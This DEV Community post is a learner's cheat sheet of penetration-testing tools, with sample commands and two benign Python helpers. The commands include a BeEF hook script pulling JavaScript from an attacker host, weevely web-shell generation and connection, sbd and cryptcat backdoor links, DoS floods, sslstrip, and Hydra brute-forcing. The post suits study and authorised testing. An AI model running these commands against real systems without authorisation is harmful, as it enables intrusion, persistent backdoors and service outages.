DEV Community

Alpha Olomi

Tools for Penetration Testing

Over the course of my learning, I compiled a list of the different tools used in penetration testing and ethical hacking.

Database Tools Usage

  1. sqlmap

Automates detecting and exploiting SQL injection flaws and taking over database servers.

sqlmap -u victim_url
sqlmap --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686;rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' --level=5 --risk=3 -p id --suffix="-BR" -v3

CMS Scanning Tools

  1. WPScan
wpscan --version
wpscan -u URL_of_webpage
  1. Joomscan
joomscan -h
joomscan --version
joomscan /?
joomscan -u victim_url

SSL Scanning Tools

  1. TLSSLed
tlssled URL port
  1. w3af

Web application attack and audit framework.

  • start it:
w3af
  • enter the URL of the victim
  • start the scan

Exploitation Tools

  1. Metasploit
msfupdate
msf > search name:Microsoft type:exploit
  1. Armitage

GUI front-end for Metasploit.

  1. BeEF
beef-xss

Default username and password: beef.

<script src="http://192.168.1.101:3000/hook.js" type="text/javascript"></script>
  1. Linux Exploit Suggester

root@parrot:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

Forensics Tools

  1. p0f identifies the operating system of a target host simply by examining captured packets.

In the hands of advanced users, P0f can detect firewall
presence, NAT use, and existence of load balancers.

p0f --version
p0f -h

p0f -i eth0 -p -o filename
  • open 192.168.1.2
  1. pdf-parser

Parses a PDF document to identify the fundamental elements used in the analyzed PDF.

# -o 10 = show indirect object 10
pdf-parser -o 10 filepath
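What the object lookup above does under the hood, as an added example (my own Python, not pdf-parser's code): find every "N G obj ... endobj" block, pull out one object by number the way -o does, list each object's /Type, and flag the keys a forensic triage looks at first. The PDF is constructed inline; its object numbers and the /OpenAction entry are made up for the demonstration.

```python
"""Minimal PDF indirect-object walker (added example, not pdf-parser's own code)."""
import re

# Constructed sample: a four-object PDF whose catalog points /OpenAction at a JavaScript action.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 10 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>
endobj
10 0 obj
<< /Type /Action /S /JavaScript /JS (app.alert('hi')) >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

# "N G obj <body> endobj"; DOTALL so the body may span lines, lazy so it stops at the first endobj.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\s*(.*?)\s*endobj", re.DOTALL)
TYPE_RE = re.compile(rb"/Type\s*/(\w+)")


def parse_objects(pdf: bytes) -> dict:
    """Return {object_number: body_bytes} for every indirect object in the file."""
    return {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(pdf)}


def get_object(pdf: bytes, number: int) -> str:
    """Equivalent of pdf-parser's -o N: the body of one indirect object as text."""
    objs = parse_objects(pdf)
    if number not in objs:
        raise KeyError(f"object {number} not found")
    return objs[number].decode("latin-1")


def object_types(pdf: bytes) -> dict:
    """Map each object number to its /Type name (None if the object has no /Type)."""
    result = {}
    for num, body in parse_objects(pdf).items():
        m = TYPE_RE.search(body)
        result[num] = m.group(1).decode() if m else None
    return result


def flagged_keys(pdf: bytes, keys=(b"/JavaScript", b"/JS", b"/OpenAction", b"/Launch")) -> dict:
    """Objects containing keys that a PDF triage usually inspects first."""
    hits = {}
    for num, body in parse_objects(pdf).items():
        found = [k.decode() for k in keys if k in body]
        if found:
            hits[num] = found
    return hits


if __name__ == "__main__":
    print(get_object(SAMPLE_PDF, 10))
    print(object_types(SAMPLE_PDF))
    print(flagged_keys(SAMPLE_PDF))
```

Real files also carry object streams and cross-reference tables, which this regex walk ignores; pdf-parser handles those, and the point here is only the object-by-number model the -o option exposes.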
  1. dumpzilla

Extracts all forensically interesting information from Firefox, Iceweasel, and SeaMonkey browsers.

  1. ddrescue

Copies data from one file or block device (hard disk, CD-ROM, etc.) to another, trying to rescue the good parts first in case of read errors.

dd_rescue infilepath outfilepath

dd_rescue -v /dev/sdb ~/sec.img
  1. DFF

dff-gui

Social Engineering

  1. Social Engineering Toolkit
sudo apt install sendmail
vim config/set_config
# change the SENDMAIL=OFF flag to SENDMAIL=ON

Stressing Tools

Used for DoS attacks or to stress-test different applications so that appropriate measures can be taken for the future.

  1. Slowhttptest
slowhttptest --version
slowhttptest -h

# sample
slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET -u http://192.168.1.202/index.php -x 24 -p 2

Where,
-c 500 = 500 connections
-H = Slowloris mode
-g = generate statistics
-o outputfile = output file name
-i 10 = use 10 seconds to wait for data
-r 200 = 200 connections
-t GET = GET requests
-u http://192.168.1.202/index.php = target URL
-x 24 = maximum length of 24 bytes
-p 2 = 2-second timeout

  1. Inviteflood

SIP/SDP INVITE message flooding over UDP/IP.

inviteflood --version

# format
inviteflood eth0 target_extension target_domain target_ip number_of_packets

# sample
inviteflood eth0 2000 192.168.x.x 192.168.x.x 1

Where,
target_extension is 2000
target_domain is 192.168.x.x
target_ip is 192.168.x.x
number_of_packets is 1
-a is alias of SIP account

  1. Iaxflood

VoIP DoS tool

iaxflood --version
iaxflood -h

iaxflood sourcename destinationname numpackets
iaxflood ip_src ip_dest packets
  1. thc-ssl-dos

Verifies the performance of SSL. Establishing a secure SSL connection requires 15x more processing power on the server than on the client.

# format
thc-ssl-dos victimIP httpsport --accept
# example
thc-ssl-dos 192.168.1.1 443 --accept

Sniffing & Spoofing

  1. Burpsuite

Intercepting proxy between your browser and the web servers, used to find the parameters that the web application uses.

  1. mitmproxy

SSL-capable man-in-the-middle HTTP proxy.

mitmproxy --version
mitmproxy -h
mitmproxy -p portnumber
mitmproxy -p 80
  1. Wireshark

  2. sslstrip

MITM tool that forces a victim's browser to communicate in plain text over HTTP.

sslstrip --version
sslstrip -h
sslstrip -p 80

Password Cracking Tools

  1. Hydra

Login cracker that supports many protocols.

# -L = file of user names, -P = file of passwords, -V = show each attempt
hydra -L /usr/share/wordlists/metasploit/user -P /usr/share/wordlists/metasploit/passwords ftp://192.168.1.101 -V
  1. Johnny

GUI for the John the Ripper password cracking tool

  1. John

The John the Ripper command-line cracker that the Johnny GUI wraps.

unshadow passwd shadow > unshadowed.txt
  1. Rainbowcrack cracks hashes by rainbow table lookup.
rcrack -h

rcrack path_to_rainbow_tables -f path_to_password_hash
./rcrack . -h 5d41402abc4b2a76b9719d911017c592
./rcrack . -l hash.txt
  1. SQLdict

Dictionary attack tool for SQL Server.

sqldict
  • Under “Target IP Server”, enter the server IP.
  • Under “Target Account”, enter the username.
  • Load the password file.
  • Start.
  1. hash-identifier

Identifies the type of a hash.

hash-identifier 5d41402abc4b2a76b9719d911017c592
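How a tool like hash-identifier arrives at its answer, as an added example (my own heuristic in Python, not hash-identifier's code): modular-crypt strings name their algorithm in a prefix, pwdump lines are two 32-hex halves around a colon, and a bare hex digest can only be classified by length, which is why the same 32-hex value is reported as MD5, MD4 or NTLM rather than one of them. The candidate tables below are my own selection, not the tool's full list.

```python
"""Hash-type identification by prefix, shape and length (added example, not hash-identifier's code)."""
import re

# Bare hex digests: length is the only signal, so several algorithms share a slot.
HEX_LENGTHS = {
    32: ["MD5", "MD4", "NTLM"],
    40: ["SHA-1", "RIPEMD-160"],
    56: ["SHA-224"],
    64: ["SHA-256", "SHA3-256"],
    96: ["SHA-384"],
    128: ["SHA-512", "SHA3-512"],
}

# Modular-crypt format: the algorithm is spelled out in the leading "$id$".
PREFIXES = {
    "$1$": "MD5-crypt",
    "$2a$": "bcrypt",
    "$2b$": "bcrypt",
    "$2y$": "bcrypt",
    "$5$": "SHA-256-crypt",
    "$6$": "SHA-512-crypt",
    "$argon2": "Argon2",
}

HEX32 = re.compile(r"[0-9a-fA-F]{32}")


def identify_hash(candidate: str) -> list:
    """Return candidate algorithm names, most common first; [] if nothing matches."""
    h = candidate.strip()

    # 1. Prefixed formats are unambiguous.
    for prefix, name in PREFIXES.items():
        if h.startswith(prefix):
            return [name]

    # 2. pwdump-style "LM:NT" pair: two 32-hex halves separated by a colon.
    parts = h.split(":")
    if len(parts) == 2 and all(HEX32.fullmatch(p) for p in parts):
        return ["LM:NTLM pair (pwdump format)"]

    # 3. Plain hex digest: classify by length only, so return every algorithm of that size.
    if re.fullmatch(r"[0-9a-fA-F]+", h):
        return list(HEX_LENGTHS.get(len(h), []))

    return []


if __name__ == "__main__":
    for sample in ("5d41402abc4b2a76b9719d911017c592", "$6$salt$hash", "not a hash"):
        print(sample, "->", identify_hash(sample))
```

Because step 3 is purely length-based, the output for a 32-hex string is a list of three candidates; confirming which one applies needs context (where the hash came from), which is exactly the ambiguity hash-identifier's multi-line output reflects.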

Maintaining Access

Tools used to keep a connection to, and access on, a hacked machine even when it disconnects and reconnects.

  1. Powersploit

Helps connect to the victim's machine via PowerShell.

cd /usr/share/powersploit/
  1. Sbd

Similar to Netcat; features AES-CBC-128 + HMAC-SHA1 encryption.

# server
sbd -l -p 44

# client (victim)
sbd 192.168.43.2 44
  1. Weevely

PHP web shell that simulates a telnet-like connection, used as a stealth backdoor.

# check
weevely -h

# format
weevely generate password pathoffile
# sample
weevely generate adm1n123 ~/Desktop/about1.php

# format
weevely URL password
# sample
weevely http://198.168.32.13 adm1n123
  1. http-tunnel

Creates a bidirectional virtual data stream tunneled in HTTP requests. This can be useful for users behind restrictive firewalls.

# server
httptunnel_server -h

# client
httptunnel_client -h
  1. cryptcat

Similar to Netcat; makes TCP and UDP connections to a victim's machine in encrypted form.

# server
cryptcat -l -p port -n

# client
cryptcat IPofServer PortofServer

Reverse Engineering

  1. OllyDbg

32-bit assembler-level analysing debugger for MS Windows applications, used to crack commercial software.

  • start
ollydbg
  1. dex2jar

Converts an APK file (Android) to a JAR file so the source code can be viewed.

d2j-dex2jar -d /file/location
d2j-dex2jar -d ~/Desktop/class.dex
  1. jd-gui

Standalone graphical utility that displays the Java source code of “.class” files.

jd-gui
  1. apktool

One of the best tools for reversing a whole Android application.

apktool
# decompile
apktool d file.apk

Reporting Tools

  1. Dradis
service dradis start
dradis
  1. Metagoofil

Searches Google to identify and download documents to the local disk, then extracts their metadata.

# help
metagoofil -h
metagoofil -d udsm -t docx -l 3 -o ~/Downloads -f ~/Downloads/metagoofil_res

  • -d (domain name)
  • -t (file type to download: doc, pdf, etc.)
  • -l (limit the results: 10, 100)
  • -n (limit the files to download)
  • -o (location to save the files)
  • -f (output file)

Misc

  1. strace
# format
strace -e trace=network,read,write /path/to/app args
# example
strace -e trace=network,read,write customapp
